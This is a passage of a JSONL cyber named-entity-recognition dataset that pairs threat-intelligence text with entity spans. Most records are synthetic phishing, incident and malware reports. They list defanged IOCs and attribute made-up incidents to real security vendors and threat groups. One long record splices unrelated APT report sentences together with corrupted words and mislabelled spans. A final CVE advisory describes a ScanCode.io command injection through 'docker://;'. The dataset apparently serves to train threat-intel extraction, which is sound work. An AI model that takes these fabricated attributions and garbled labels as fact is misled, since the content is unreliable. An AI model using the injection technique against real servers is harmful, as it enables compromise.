"defanged_augment"}}
{"text": "Phishing Campaign Report: CrowdStrike identified a large-scale phishing operation. Emails originated from notification@urgent-notice[.]online and contact@auth-check[.]org, spoofing legitimate services. Victims were directed to hxxps://gatewaysecure[.]org/download/update.exe which hosted a credential harvesting page on update-mail[ . ]dev. A secondary link hxxp://secure-cloud[ . ]club/admin/config delivered NjRAT (SHA256: fd94894a16772fc852de488d158c774a62eacef12116e733614f9eaf93814fb9). The malware was saved to /tmp/svchost.exe and established C2 with 10 [ . ] 9 [ . ] 192 [ . ] 64.", "spans": {"Organization: CrowdStrike": [[26, 37]], "Indicator: notification@urgent-notice.online": [[106, 141]], "Indicator: contact@auth-check.org": [[146, 170]], "Indicator: hxxps://gatewaysecure.org/download/update.exe": [[227, 274]], "Indicator: update-mail.dev": [[320, 339]], "Indicator: http://secure-cloud.club/admin/config": [[358, 399]], "Malware: NjRAT": [[410, 415]], "Indicator: fd94894a16772fc852de488d158c774a62eacef12116e733614f9eaf93814fb9": [[425, 489]], "Indicator: 10.9.192.64": [[558, 587]]}, "info": {"id": "synth_v2_00912", "source": "defanged_augment"}}
{"text": "According to Kaspersky Lab’s report , NetTraveler has been active since as early as 2004; however , the highest volume of activity occurred from 2010 – 2013 . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and aACT from direct intellectual property theft since 2015 . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. , possibly en masse . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen… and using BalkanRAT , they can do whatever they want on the computer . The BalkanDoor backdoor does not implement any Exfiltration channel . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher . The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 . Based on the Let’s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . Further analysis of the BITTER APT’s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group’s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user’s credentials . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People’s Republic of China . 360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . Here , we investigate a campaign targeting an Asian government organization . We observed another campaign targeting an organisation located in Lebanon . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword[.]exe . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . During its recent campaigns , Cloud Atlas used a new polymorphic” infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . In one article published in the Kharkiv Observer – an independent Ukranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites — a technique known as online skimming — thereby stealing payment card data transmitted to the vendor by unsuspecting customers . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Attackers use it to create , expand and cement their foothold in compromised environments . Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd[.]exe . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library ( DLL ) , as described below , to create a reverse shell and connect to a remote host . Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . After injecting Meterpreter into memory , the attacker had complete control of the infected device . IBM X-Force IRIS has gained insight into ITG08’s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08’s use of PowerShell to conduct malicious activity . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . CTU research indicates that LYCEUM may have been active as early as April 2018 . In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . Aside from deploying novel malware , LYCEUM’s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . ESET has been tracking a new version of Machete (the group’s Python-based toolset) that was first seen in April 2018 . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . Machete is interested in files that describe navigation routes and positioning using military grids . The Machete group sends very specific emails directly to its victims , and these change from target to target . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . The GoogleUpdate[ . ]exe component is responsible for communicating with the remote C&C server . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . This ACT , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations . The group behind Machete uses effective spearphishing techniques . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . In 2018 Machete reappeared with new code and new features . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . Machete was active and constantly working on very effective spearphishing campaigns . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Machete relies on spearphishing to compromise its targets . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . By introducing small changes to their code and infrastructure , the group has bypassed several security products . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking . In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their LOCs of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking .", "spans": {"Organization: Kaspersky": [[13, 22], [15763, 15772], [16998, 17007]], "Organization: video game industry": [[737, 756]], "Indicator: BalkanRAT": [[793, 802], [1833, 1842]], "Indicator: BalkanDoor": [[914, 924], [1847, 1857], [2111, 2121]], "Organization: financial": [[1160, 1169]], "Organization: Serbian security": [[1278, 1294]], "Vulnerability: exploit": [[1771, 1778], [2270, 2277], [6140, 6147], [6343, 6350], [7091, 7098], [7122, 7129]], "Vulnerability: CVE-2018-20250": [[1811, 1825], [2307, 2321]], "Malware: BalkanRAT": [[2424, 2433]], "Malware: BalkanDoor backdoor": [[2489, 2508]], "Malware: ADORE.XSEC": [[2571, 2581]], "System: Linux": [[2586, 2591], [2665, 2670]], "Indicator: backdoor": [[2689, 2697]], "Indicator: BalkanRAT malware": [[2809, 2826]], "Malware: POISONPLUG": [[2926, 2936]], "Organization: Encrypt": [[3209, 3216]], "Organization: CERT 360": [[3399, 3407]], "Organization: government sites": [[3569, 3585]], "Organization: enterprises": [[3602, 3613]], "Organization: government": [[3732, 3742], [3840, 3850], [7980, 7990]], "Organization: organisations": [[3762, 3775]], "Organization: government agencies": [[4074, 4093]], "Organization: 360-CERT": [[4151, 4159]], "Organization: Anomali": [[4546, 4553]], "Organization: 360 Threat Intelligence Center": [[4769, 4799]], "Malware: China Chopper": [[4936, 4949], [5336, 5349], [5481, 5494]], "Indicator: China Chopper": [[5127, 5140], [5685, 5698], [7016, 7029]], "Organization: Cisco Talos": [[5301, 5312]], "Organization: government organization": [[5583, 5606]], "Indicator: Mimikatz Lite": [[5946, 5959]], "Indicator: GetPassword.exe": [[5963, 5980]], "Indicator: tool": [[5987, 5991]], "Vulnerability: CVE-2018–8440": [[6148, 6161]], "Vulnerability: vulnerability": [[6190, 6203], [8819, 8832]], "System: Windows": [[6207, 6214], [6524, 6531], [7134, 7141]], "Vulnerability: proof-of-concept": [[6326, 6342]], "Organization: Palo Alto": [[6954, 6963]], "Vulnerability: CVE-2015-0062": [[7158, 7171]], "Vulnerability: CVE-2015-1701": [[7174, 7187]], "Vulnerability: CVE-2016-0099": [[7192, 7205]], "Organization: Microsoft": [[7375, 7384], [20902, 20911]], "Vulnerability: CVE-2017-11882": [[7408, 7422]], "Vulnerability: CVE-2018-0802": [[7434, 7447]], "Organization: military": [[7995, 8003], [14783, 14791], [16887, 16895], [17401, 17409], [17845, 17853], [18027, 18035], [18545, 18553]], "Organization: Presidential Administration": [[8344, 8371]], "Organization: organizations": [[8479, 8492], [14792, 14805], [18849, 18862]], "Malware: documents": [[8571, 8580]], "Malware: (RMS)": [[8676, 8681]], "Indicator: archive": [[8751, 8758]], "Organization: e-commerce environments": [[9073, 9096]], "Organization: retailers": [[9581, 9590]], "Organization: hospitality sector": [[9612, 9630]], "Malware: More_eggs backdoor": [[9690, 9708], [11996, 12014]], "Malware: Comodo code-signing certificates": [[9859, 9891]], "Indicator: More_eggs backdoor": [[10133, 10151], [10331, 10349]], "Indicator: More_eggs malware": [[10185, 10202]], "Indicator: cmd.exe": [[10286, 10295]], "Organization: X-Force IRIS": [[10298, 10310]], "Malware: WMI": [[10620, 10623]], "System: PowerShell": [[10628, 10638], [12191, 12201]], "Malware: More_eggs": [[10912, 10921], [11482, 11491]], "Malware: Mimikatz": [[11009, 11017]], "Malware: More_eggs JScript backdoor": [[11117, 11143], [11381, 11407]], "Indicator: Mimikatz": [[11146, 11154]], "Malware: offensive security tools": [[11541, 11565]], "Malware: PowerShell scripts": [[11570, 11588]], "Organization: IBM X-Force IRIS": [[11740, 11756]], "Malware: tools": [[11871, 11876]], "Organization: strategic national importance": [[12294, 12323]], "Organization: oil and gas": [[12336, 12347]], "Organization: telecommunications": [[12361, 12379]], "Organization: CTU": [[12382, 12385], [12922, 12925], [13353, 13356], [14002, 14005], [14405, 14408]], "Malware: post-intrusion tools": [[13225, 13245]], "Indicator: DanBot": [[13326, 13332]], "Malware: Get-LAPSP.ps1": [[13371, 13384]], "Malware: PowerShell script": [[13390, 13407]], "Malware: DanBot": [[13504, 13510]], "Malware: maldocs": [[13606, 13613]], "Organization: executives": [[13796, 13806]], "Organization: HR staff": [[13809, 13817]], "Organization: IT personnel": [[13824, 13836]], "Malware: maldoc": [[13879, 13885]], "Organization: ICS": [[13910, 13913]], "Organization: OT staff": [[13917, 13925]], "Organization: energy organizations": [[14191, 14211]], "Malware: malware": [[14908, 14915]], "Organization: ESET": [[14963, 14967], [16000, 16004], [16779, 16783], [17260, 17264], [18365, 18369]], "Organization: Ecuadorean military": [[15142, 15161]], "Organization: describe navigation routes": [[15417, 15443]], "Indicator: Previous versions": [[15727, 15744]], "Indicator: GoogleUpdate.exe": [[15907, 15927]], "Indicator: malware": [[16121, 16128]], "Organization: Cylance": [[17035, 17042]], "Indicator: They": [[19258, 19262]], "Organization: report": [[19728, 19734]], "Organization: industrial sectors": [[20039, 20057]], "Indicator: document files": [[20873, 20887]], "Organization: financial institutions": [[21075, 21097]], "Organization: medical": [[21275, 21282]], "Organization: pharmaceutical": [[21285, 21299]], "Organization: media": [[21302, 21307]], "Organization: energy": [[21310, 21316]], "Organization: manufacturing": [[21321, 21334]], "Malware: ServHelper": [[21401, 21411]], "Malware: FlawedAmmy RAT": [[21416, 21430]]}, "info": {"id": "cyberner_stix_train_007910", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Volexity identified a large-scale phishing operation. Emails originated from admin@urgent-notice[ . ]online and ceo@mail-service[.]info, spoofing legitimate services. Victims were directed to hxxps://edge-gateway[ . ]online/callback which hosted a credential harvesting page on data-gateway[ . ]net. A secondary link hxxps://cdn-cdn[ . ]com/admin/config delivered Ryuk (SHA256: c1547549316258ca58cf61442f777b5f1f9a6c3aa89da7c89417df160ae17c29). The malware was saved to C:\\Windows\\Tasks\\chrome_helper.exe and established C2 with 192 [ . ] 43 [ . ] 162 [ . ] 24.", "spans": {"Organization: Volexity": [[26, 34]], "Indicator: admin@urgent-notice.online": [[103, 133]], "Indicator: ceo@mail-service.info": [[138, 161]], "Indicator: https://edge-gateway.online/callback": [[218, 258]], "Indicator: data-gateway.net": [[304, 324]], "Indicator: https://cdn-cdn.com/admin/config": [[343, 379]], "Malware: Ryuk": [[390, 394]], "Indicator: c1547549316258ca58cf61442f777b5f1f9a6c3aa89da7c89417df160ae17c29": [[404, 468]], "Indicator: 192.43.162.24": [[555, 586]]}, "info": {"id": "synth_v2_00914", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 74 [ . ] 109 [ . ] 82, the Microsoft MSRC IR team identified SystemBC running as C:\\Program Files\\Common Files\\backdoor.elf. The threat actor, believed to be Midnight Blizzard, used BloodHound for credential harvesting and Certutil for lateral movement. Exfiltrated data was sent to gatewayproxy[ . ]xyz and cloud-update[.]link. The initial dropper (SHA256: 0be1316b3afdc0e2e6ae7e28996840f002af825af6cf86d7fb0e570c56a02fe6) was delivered via a phishing email from info@mail-service[ . ]info. A second C2 node was observed at 192 [ . ] 194 [ . ] 31 [ . ] 240, with a persistence mechanism writing to /usr/local/bin/config.dat.", "spans": {"Indicator: 172.74.109.82": [[64, 95]], "Organization: Microsoft MSRC": [[101, 115]], "Malware: SystemBC": [[135, 143]], "Indicator: gatewayproxy.xyz": [[357, 377]], "Indicator: cloud-update.link": [[382, 401]], "Indicator: 0be1316b3afdc0e2e6ae7e28996840f002af825af6cf86d7fb0e570c56a02fe6": [[432, 496]], "Indicator: info@mail-service.info": [[538, 564]], "Indicator: 192.194.31.240": [[599, 631]]}, "info": {"id": "synth_v2_00374", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: ShadowPad (MD5: 561b92984a9ce23ceb8228b961011f42). Upon execution on Ubuntu 22.04, the sample creates /dev/shm/dropper.ps1 and injects into legitimate processes. Network analysis shows beaconing to 172[.]190[.]74[.]83 every 60 seconds and DNS queries to gatewaysecure[ . ]cc. The second stage was fetched from hxxps://mailrelay[ . ]tech/download/update.exe and written to C:\\Program Files\\Common Files\\csrss.exe. The payload uses Sliver-style techniques for defense evasion. A secondary hash (SHA1: e2fd0b75be730bbf9734bd05078c91dab4f4b7e4) was extracted from the unpacked payload.", "spans": {"Malware: ShadowPad": [[25, 34]], "Indicator: 561b92984a9ce23ceb8228b961011f42": [[41, 73]], "System: Ubuntu 22.04": [[94, 106]], "Indicator: 172.190.74.83": [[223, 242]], "Indicator: gatewaysecure.cc": [[279, 299]], "Indicator: https://mailrelay.tech/download/update.exe": [[335, 381]], "Indicator: e2fd0b75be730bbf9734bd05078c91dab4f4b7e4": [[524, 564]]}, "info": {"id": "synth_v2_00571", "source": "defanged_augment"}}
{"text": "Lazarus Group used Net-GPPPassword for credential dumping and ADFind for lateral movement. Credentials were exfiltrated to 158[.]118[.]81[.]238. The attacker pivoted to 216 [ . ] 3 [ . ] 118 [ . ] 160 and dropped C:\\Recovery\\WindowsRE\\agent.exe (MD5: 1d62870c66779c42edf8de1f8d3734f6). C2 traffic was routed through data-backup[[ . ]]site.", "spans": {"Indicator: 158.118.81.238": [[123, 143]], "Indicator: 216.3.118.160": [[169, 200]], "Indicator: 1d62870c66779c42edf8de1f8d3734f6": [[251, 283]], "Indicator: data-backup[.]site": [[316, 338]]}, "info": {"id": "synth_00042", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: BumbleBee (SHA1: b8f5787ce46ec96d8f909a4d60aca6d067d0b338). Upon execution on VMware ESXi, the sample creates C:\\Users\\Public\\Documents\\shell.php and injects into legitimate processes. Network analysis shows beaconing to 192[.]222[.]136[.]27 every 60 seconds and DNS queries to edgestatic[.]live. The second stage was fetched from hxxp://staticnode[ . ]live/login and written to C:\\Users\\Public\\Documents\\shell.php. The payload uses Metasploit-style techniques for defense evasion. A secondary hash (MD5: 7c72780a56275f245e7bda7e0a49630b) was extracted from the unpacked payload.", "spans": {"Malware: BumbleBee": [[25, 34]], "Indicator: b8f5787ce46ec96d8f909a4d60aca6d067d0b338": [[42, 82]], "System: VMware ESXi": [[103, 114]], "Indicator: 192.222.136.27": [[246, 266]], "Indicator: edgestatic.live": [[303, 320]], "Indicator: http://staticnode.live/login": [[356, 388]], "Indicator: 7c72780a56275f245e7bda7e0a49630b": [[530, 562]]}, "info": {"id": "synth_v2_00509", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 11[.]181[.]71[.]120, the Trend Micro IR team identified Emotet running as /opt/app/bin/sam.hive. The threat actor, believed to be OilRig, used Burp Suite for credential harvesting and BloodHound for lateral movement. Exfiltrated data was sent to mail-node[ . ]site and secure-login[.]tech. The initial dropper (SHA1: bf1feef567cdc17543d10c3daba5dc737e63dee9) was delivered via a phishing email from service@secure-verify[.]net. A second C2 node was observed at 71[.]4[.]81[.]92, with a persistence mechanism writing to C:\\Windows\\System32\\backdoor.elf.", "spans": {"Indicator: 11.181.71.120": [[64, 83]], "Organization: Trend Micro": [[89, 100]], "Malware: Emotet": [[120, 126]], "Indicator: mail-node.site": [[310, 328]], "Indicator: secure-login.tech": [[333, 352]], "Indicator: bf1feef567cdc17543d10c3daba5dc737e63dee9": [[381, 421]], "Indicator: service@secure-verify.net": [[463, 490]], "Indicator: 71.4.81.92": [[525, 541]]}, "info": {"id": "synth_v2_00407", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from info@account-update[.]xyz and report@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://mail-cache[.]club/download/update.exe which hosted a credential harvesting page on login-cache[ . ]tech. A secondary link hxxp://authapi[ . ]tech/wp-content/uploads/doc.php delivered RemcosRAT (SHA1: 95744d675ee05e8e5951cf6cfc30c9339e0fcbb4). The malware was saved to C:\\Users\\admin\\Desktop\\helper.sh and established C2 with 63 [ . ] 237 [ . ] 78 [ . ] 166.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: info@account-update.xyz": [[103, 128]], "Indicator: report@account-update.xyz": [[133, 160]], "Indicator: hxxp://mail-cache.club/download/update.exe": [[217, 261]], "Indicator: login-cache.tech": [[307, 327]], "Indicator: http://authapi.tech/wp-content/uploads/doc.php": [[346, 396]], "Malware: RemcosRAT": [[407, 416]], "Indicator: 95744d675ee05e8e5951cf6cfc30c9339e0fcbb4": [[424, 464]], "Indicator: 63.237.78.166": [[549, 580]]}, "info": {"id": "synth_v2_00865", "source": "defanged_augment"}}
{"text": "A common misconfiguration attempts to download the non-existant file at hxxp://www[.]server[.]com/sqlite3.dll", "spans": {"Indicator: http://www.server.com/sqlite3.dll": [[72, 109]]}, "info": {"id": "cyner2_train_006411", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 10 [ . ] 201 [ . ] 143, the Cisco Talos IR team identified RemcosRAT running as /opt/app/bin/taskhost.exe. The threat actor, believed to be Lazarus Group, used WinPEAS for credential harvesting and Merlin for lateral movement. Exfiltrated data was sent to secure-static[.]club and update-edge[ . ]online. The initial dropper (SHA1: ee15444db6355986caa1363ebb0bee0d2c43b820) was delivered via a phishing email from security@secure-verify[ . ]net. A second C2 node was observed at 17[.]63[.]106[.]248, with a persistence mechanism writing to C:\\Users\\admin\\AppData\\Local\\Temp\\payload.bin.", "spans": {"Indicator: 172.10.201.143": [[64, 96]], "Organization: Cisco Talos": [[102, 113]], "Malware: RemcosRAT": [[133, 142]], "Indicator: secure-static.club": [[330, 350]], "Indicator: update-edge.online": [[355, 377]], "Indicator: ee15444db6355986caa1363ebb0bee0d2c43b820": [[406, 446]], "Indicator: security@secure-verify.net": [[488, 518]], "Indicator: 17.63.106.248": [[553, 572]]}, "info": {"id": "synth_v2_00338", "source": "defanged_augment"}}
{"text": "ScanCode[.]io is a server to script and automate software composition analysis with ScanPipe pipelines. Prior to version 32.5.1, the software has a possible command injection vulnerability in the docker fetch process as it allows to append malicious commands in the `docker_reference` parameter.\n\nIn the function `scanpipe/pipes/fetch.py:fetch_docker_image` the parameter `docker_reference` is user controllable. The `docker_reference` variable is then passed to the vulnerable function `get_docker_image_platform`.  However, the `get_docker_image_plaform` function constructs a shell command with the passed `docker_reference`. The `pipes.run_command` then executes the shell command without any prior sanitization, making the function vulnerable to command injections. A malicious user who is able to create or add inputs to a project can inject commands. Although the command injections are blind and the user will not receive direct feedback without logs, it is still possible to cause damage to the server/container. The vulnerability appears for example if a malicious user adds a semicolon after the input of `docker://;`, it would allow appending malicious commands.\n\nVersion 32.5.1 contains a patch for this issue. The `docker_reference` input should be sanitized to avoid command injections and, as a workaround, one may avoid creating commands with user controlled input directly.", "spans": {"Indicator: ScanCode.io": [[0, 13]], "Vulnerability: command injection": [[157, 174]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-39523"}}
